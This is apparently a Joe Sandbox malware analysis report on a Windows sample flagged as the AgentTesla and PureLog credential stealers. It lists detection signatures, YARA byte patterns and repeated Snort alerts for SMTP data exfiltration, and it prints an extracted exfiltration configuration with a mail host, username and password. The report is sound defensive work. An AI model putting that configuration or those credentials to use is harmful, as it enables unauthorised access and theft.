Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GkYUK8VCrO.exe

Overview

General Information

Sample name:GkYUK8VCrO.exe
renamed because original name is a hash value
Original sample name:7d50650cd2ba63482d4caf875ae65a8e.exe
Analysis ID:1465576
MD5:7d50650cd2ba63482d4caf875ae65a8e
SHA1:037e5a7f82d5c436f744e5b7475f6264c32e6519
SHA256:b54b494944a8b5268e3d3190c5a45af28afdada7eb0fc85fece3c22e2d31b3f1
Tags:32exetrojan
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains VNC / remote desktop functionality (version string found)
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • GkYUK8VCrO.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\GkYUK8VCrO.exe" MD5: 7D50650CD2BA63482D4CAF875AE65A8E)
    • RegSvcs.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\GkYUK8VCrO.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • GkYUK8VCrO.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\GkYUK8VCrO.exe" MD5: 7D50650CD2BA63482D4CAF875AE65A8E)
      • RegSvcs.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\GkYUK8VCrO.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fasmacopy.gr", "Username": "info@fasmacopy.gr", "Password": "Fam28sjd"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.1694565246.00000000036C0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 25 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
    00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
          • 0x403ad:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
          • 0x4041f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
          • 0x404a9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
          • 0x4053b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
          • 0x405a5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
          • 0x40617:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
          • 0x406ad:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
          • 0x4073d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
          Click to see the 16 entries
          SourceRuleDescriptionAuthorStrings
          3.2.RegSvcs.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 25 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          3.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 25 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          3.2.RegSvcs.exe.2fffe36.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            3.2.RegSvcs.exe.2fffe36.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              3.2.RegSvcs.exe.2fffe36.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 39 entries

                System Summary

                barindex
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 79.170.44.32, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7516, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
                Timestamp:07/01/24-20:28:15.672861
                SID:2840032
                Source Port:49746
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:10.465136
                SID:2851779
                Source Port:49739
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:55.662732
                SID:2851779
                Source Port:49751
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:54.008944
                SID:2855542
                Source Port:49744
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:49.212686
                SID:2851779
                Source Port:49743
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:29:20.588265
                SID:2840032
                Source Port:49754
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:17.781472
                SID:2851779
                Source Port:49747
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:25:22.036965
                SID:2855245
                Source Port:49731
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:25:22.036854
                SID:2030171
                Source Port:49731
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:36.709148
                SID:2840032
                Source Port:49742
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:55.662732
                SID:2855542
                Source Port:49751
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:17.781472
                SID:2855542
                Source Port:49747
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:29:11.831875
                SID:2030171
                Source Port:49753
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:29:20.587012
                SID:2851779
                Source Port:49754
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:10.465136
                SID:2855542
                Source Port:49739
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:36.708969
                SID:2030171
                Source Port:49742
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:22.436606
                SID:2855542
                Source Port:49740
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:25:22.036965
                SID:2840032
                Source Port:49731
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:10.465136
                SID:2030171
                Source Port:49739
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:55.662771
                SID:2840032
                Source Port:49751
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:54.008944
                SID:2851779
                Source Port:49744
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:15.672815
                SID:2851779
                Source Port:49746
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:01.279510
                SID:2030171
                Source Port:49745
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:25:22.036965
                SID:2851779
                Source Port:49731
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:01.279625
                SID:2840032
                Source Port:49745
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:10.465306
                SID:2840032
                Source Port:49739
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:49.212686
                SID:2855542
                Source Port:49743
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:55.662704
                SID:2030171
                Source Port:49751
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:15.672815
                SID:2855542
                Source Port:49746
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:22.436606
                SID:2851779
                Source Port:49740
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:29:11.831915
                SID:2851779
                Source Port:49753
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:36.337233
                SID:2030171
                Source Port:49748
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:29:07.465085
                SID:2855542
                Source Port:49752
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:29:20.587012
                SID:2030171
                Source Port:49754
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:54.008911
                SID:2030171
                Source Port:49744
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:01.279551
                SID:2851779
                Source Port:49745
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:36.337328
                SID:2840032
                Source Port:49748
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:36.709124
                SID:2855542
                Source Port:49742
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:29:07.465136
                SID:2840032
                Source Port:49752
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:25:22.036965
                SID:2855542
                Source Port:49731
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:22.436582
                SID:2030171
                Source Port:49740
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:01.279551
                SID:2855542
                Source Port:49745
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:54.008982
                SID:2840032
                Source Port:49744
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:29:11.831915
                SID:2855542
                Source Port:49753
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:17.781450
                SID:2030171
                Source Port:49747
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:29:07.465085
                SID:2851779
                Source Port:49752
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:17.783319
                SID:2840032
                Source Port:49747
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:49.212618
                SID:2030171
                Source Port:49743
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:36.337328
                SID:2855542
                Source Port:49748
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:29:11.831952
                SID:2840032
                Source Port:49753
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:22.436734
                SID:2840032
                Source Port:49740
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:36.337328
                SID:2851779
                Source Port:49748
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:36.709124
                SID:2851779
                Source Port:49742
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:29:07.465069
                SID:2030171
                Source Port:49752
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:28:15.672800
                SID:2030171
                Source Port:49746
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:29:20.587012
                SID:2855542
                Source Port:49754
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/01/24-20:27:49.212736
                SID:2840032
                Source Port:49743
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fasmacopy.gr", "Username": "info@fasmacopy.gr", "Password": "Fam28sjd"}
                Source: GkYUK8VCrO.exeReversingLabs: Detection: 42%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: GkYUK8VCrO.exeJoe Sandbox ML: detected
                Source: GkYUK8VCrO.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: GkYUK8VCrO.exe, 00000000.00000003.1681182332.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000000.00000003.1680747519.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692054040.0000000003900000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692800812.0000000003760000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: GkYUK8VCrO.exe, 00000000.00000003.1681182332.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000000.00000003.1680747519.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692054040.0000000003900000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692800812.0000000003760000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B04696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B04696
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00B0C9C7
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0C93C FindFirstFileW,FindClose,0_2_00B0C93C
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B0F200
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B0F35D
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B0F65E
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B03A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B03A2B
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B03D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B03D4E
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B0BF27

                Networking

                barindex
                Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49731 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49731 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49731 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49731 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49731 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49739 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49739 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49739 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49739 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49740 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49740 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49740 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49740 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49742 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49742 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49742 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49742 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49743 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49743 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49743 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49743 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49744 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49744 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49744 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49744 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49745 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49745 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49745 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49745 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49746 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49746 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49746 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49746 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49747 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49747 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49747 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49747 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49748 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49748 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49748 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49748 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49751 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49751 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49751 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49751 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49752 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49752 -> 79.170.44.32:587
